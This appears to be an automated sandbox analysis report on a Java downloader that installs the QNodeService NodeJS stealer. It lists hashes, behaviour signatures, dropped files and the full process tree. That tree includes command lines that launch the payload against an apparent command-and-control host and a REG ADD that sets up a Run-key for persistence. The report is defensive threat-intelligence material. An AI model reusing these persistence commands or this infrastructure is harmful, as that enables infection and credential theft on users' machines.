Analysis
-
max time kernel
74s -
max time network
113s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
23-11-2020 12:55
Static task
static1
Behavioral task
behavioral1
Sample
1.jar
Resource
win7v20201028
Behavioral task
behavioral2
Sample
1.jar
Resource
win10v20201028
General
-
Target
1.jar
-
Size
73KB
-
MD5
6608586b5b7cf330a74d4abbbd9006be
-
SHA1
8449eb2836086f220d645621a869d189696bca91
-
SHA256
1f89cb2ced0736bce39f66de5cfb11da41b9f87b8b13be3317f6b127f07cea24
-
SHA512
782919fd5ea5ace0ba94fd0ef4b8dc8009e772e414f41f85ac9d11db5096adc7fd881eafebe16695f230e2cc2a821cdec89582337cf1e1ee1939aa1fe826b1fb
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
Processes:
node.exenode.exenode.exepid process 1444 node.exe 3508 node.exe 2684 node.exe -
Loads dropped DLL 6 IoCs
Processes:
node.exepid process 2684 node.exe 2684 node.exe 2684 node.exe 2684 node.exe 2684 node.exe 2684 node.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\51e26146-0307-4cc6-b4a2-ef4fcf65fed6 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
Processes:
resource yara_rule C:\Users\Admin\node-v14.12.0-win-x64\node.exe js C:\Users\Admin\node-v14.12.0-win-x64\node.exe js C:\Users\Admin\node-v14.12.0-win-x64\node.exe js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 22 wtfismyip.com 23 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
node.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
node.exenode.exenode.exepid process 1444 node.exe 1444 node.exe 1444 node.exe 1444 node.exe 3508 node.exe 3508 node.exe 3508 node.exe 3508 node.exe 2684 node.exe 2684 node.exe 2684 node.exe 2684 node.exe 2684 node.exe 2684 node.exe 2684 node.exe 2684 node.exe 2684 node.exe 2684 node.exe -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
java.exejavaw.exenode.exenode.exenode.execmd.execmd.exedescription pid process target process PID 796 wrote to memory of 2096 796 java.exe javaw.exe PID 796 wrote to memory of 2096 796 java.exe javaw.exe PID 2096 wrote to memory of 1444 2096 javaw.exe node.exe PID 2096 wrote to memory of 1444 2096 javaw.exe node.exe PID 1444 wrote to memory of 3508 1444 node.exe node.exe PID 1444 wrote to memory of 3508 1444 node.exe node.exe PID 3508 wrote to memory of 2684 3508 node.exe node.exe PID 3508 wrote to memory of 2684 3508 node.exe node.exe PID 2684 wrote to memory of 656 2684 node.exe cmd.exe PID 2684 wrote to memory of 656 2684 node.exe cmd.exe PID 656 wrote to memory of 2396 656 cmd.exe reg.exe PID 656 wrote to memory of 2396 656 cmd.exe reg.exe PID 2684 wrote to memory of 2828 2684 node.exe cmd.exe PID 2684 wrote to memory of 2828 2684 node.exe cmd.exe PID 2828 wrote to memory of 2316 2828 cmd.exe reg.exe PID 2828 wrote to memory of 2316 2828 cmd.exe reg.exe
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\1.jar1⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\dd50d4a4.tmp2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain ntums.mooo.com3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_bKMWvi\boot.js --hub-domain ntums.mooo.com4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_bKMWvi\boot.js --hub-domain ntums.mooo.com5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "51e26146-0307-4cc6-b4a2-ef4fcf65fed6" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "51e26146-0307-4cc6-b4a2-ef4fcf65fed6" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "51e26146-0307-4cc6-b4a2-ef4fcf65fed6" /F"6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "51e26146-0307-4cc6-b4a2-ef4fcf65fed6" /F7⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestampMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
C:\Users\Admin\AppData\Local\Temp\_qhub_node_bKMWvi\boot.jsMD5
3859487feb5152e9d1afc4f8cd320608
SHA17bf154c9ddf3a71abf15906cdb60773e8ae07b62
SHA2568d19e156776805eb800ad47f85ff36b99b8283b721ebab3d47a16e2ae597fe13
SHA512826a1b3cd08e4652744a975153448288dd31073f60471729b948d7668df8e510fa7b0c6dcd63636043850364bf3cd30c1053349d42d08f8ec7c4a0655188fab8
-
C:\Users\Admin\AppData\Local\Temp\dd50d4a4.tmpMD5
6608586b5b7cf330a74d4abbbd9006be
SHA18449eb2836086f220d645621a869d189696bca91
SHA2561f89cb2ced0736bce39f66de5cfb11da41b9f87b8b13be3317f6b127f07cea24
SHA512782919fd5ea5ace0ba94fd0ef4b8dc8009e772e414f41f85ac9d11db5096adc7fd881eafebe16695f230e2cc2a821cdec89582337cf1e1ee1939aa1fe826b1fb
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exeMD5
f0b11a5823c45fc2664e116dc0323bcb
SHA1612339040c1f927ec62186cd5012f4bb9c53c1b9
SHA25616fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
SHA5120e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exeMD5
f0b11a5823c45fc2664e116dc0323bcb
SHA1612339040c1f927ec62186cd5012f4bb9c53c1b9
SHA25616fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
SHA5120e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac
-
C:\Users\Admin\node-v14.12.0-win-x64\node.exeMD5
f0b11a5823c45fc2664e116dc0323bcb
SHA1612339040c1f927ec62186cd5012f4bb9c53c1b9
SHA25616fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
SHA5120e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac
-
\Users\Admin\AppData\Local\Temp\2684-2424b2f0ce079c3f.nodeMD5
ee6e80bab410c751c935e6175acf8b5c
SHA1c44cad6425db5c9c86351f9f9f7b019b876db528
SHA256dd3bd6107fb87be3c34985df2a8a0645fa7a89172d23ddb66fec64c3236a1af3
SHA512c654c44cfe115a9c4f9eaf6ed4207511c17dc4eeb00441c2be6413d0a16c348fce0dcf282f2b9132948150e3541d248edd62b2e055a1cd902f80b9a67d2e1d77
-
\Users\Admin\AppData\Local\Temp\2684-32d9aa7222b796cb.nodeMD5
87f2661da9a09dc36a1e39b53692e172
SHA1fc6a37bfcd72d7d70a3afb6fbd752bf1e0b0990f
SHA2567d2532530cd09d589348e1d6c2a46af4d3de73ee72941a4ee5b65cd21c17ddea
SHA5127187b2761245b470f4dbdbaa258e8d3cc1f2491bea2f7649212d8abcef1ccfb4c4b7fe4d0a37ca47840dd21eea9d799c94367af43c98027ba6f1247162a9e713
-
\Users\Admin\AppData\Local\Temp\2684-597ad4d2c785b8f2.nodeMD5
2e20508eac344dfead52bdc25b73a7fb
SHA1c2918d63d3c0f14dce0552530ef0793f3a76bfa7
SHA256500e8c83a3d455c26d20fb32e02c26a47a6c7fa906ce2c0491729b731906ac98
SHA51225f8c95eb38a39e7ea60145e598f8e00b3b4c61f9ef6ae1689d3be16da7bd7c0d57a55d0d06a8402af694be880408ca6ef01829b79d9768d09967db5e3a2b8de
-
\Users\Admin\AppData\Local\Temp\2684-603039e9d1961e53.nodeMD5
f1c9cde23537dc338fb765f2c125f994
SHA16f290977d6e0666c4798b4bc17f640a18598a772
SHA2568f73b3d91365fc1a09da9e8029a47f8ad5dd24d0dab03b01cd50de5806c8fb6b
SHA5121bbdd3e50d4bcd09ca8e107596497ff3b20d82d728d485ca6eb1ee8660de0c3f4fe24dcc1657f2f59bc4f99fa2ddd525a0446eaed7999ed23b34fe8963750307
-
\Users\Admin\AppData\Local\Temp\2684-87b8227b9d3c2b8a.nodeMD5
911a4b53a8ffd6e01c0196c682f06a49
SHA15d0a4de0f72eede786da60fe49620e27b35d388d
SHA256f39651fc570f90b0c01655c61c80c3956c6f6c54df5aa8e0aae626f2cb718008
SHA512f2081eb8821f8289fdb1e907073a58381212af4872a6759c55f73667eba532bccea1e9f5695a31680708bf62e1b6da08f9e6bb21e1fec9db08ae81db57a9e6ea
-
\Users\Admin\AppData\Local\Temp\2684-97a8c4939671ca58.nodeMD5
df45601340083518d8bcc10ec848460b
SHA18613d6ab3040d57d241ed4a466c1fffb1b12455b
SHA256eebfd03defaa0965393ebde5cd45a982dda75c82d5205a702f88deec660723ed
SHA5120e1e14dd82119dc822dccc4da4d64cce62a7796ec1157defa97b4bc29d767d164e6ef65861448b24c4972cc3919bf1583518ba725757c0f96af47a942380cd41
-
memory/656-187-0x0000000000000000-mapping.dmp
-
memory/1444-179-0x000002B76B240000-0x000002B76B241000-memory.dmpFilesize
4KB
-
memory/1444-177-0x0000000000000000-mapping.dmp
-
memory/2096-53-0x0000000000000000-mapping.dmp
-
memory/2316-196-0x0000000000000000-mapping.dmp
-
memory/2396-188-0x0000000000000000-mapping.dmp
-
memory/2684-186-0x00000153AE7C0000-0x00000153AE7C1000-memory.dmpFilesize
4KB
-
memory/2684-184-0x0000000000000000-mapping.dmp
-
memory/2828-195-0x0000000000000000-mapping.dmp
-
memory/3508-182-0x000002B972280000-0x000002B972281000-memory.dmpFilesize
4KB
-
memory/3508-180-0x0000000000000000-mapping.dmp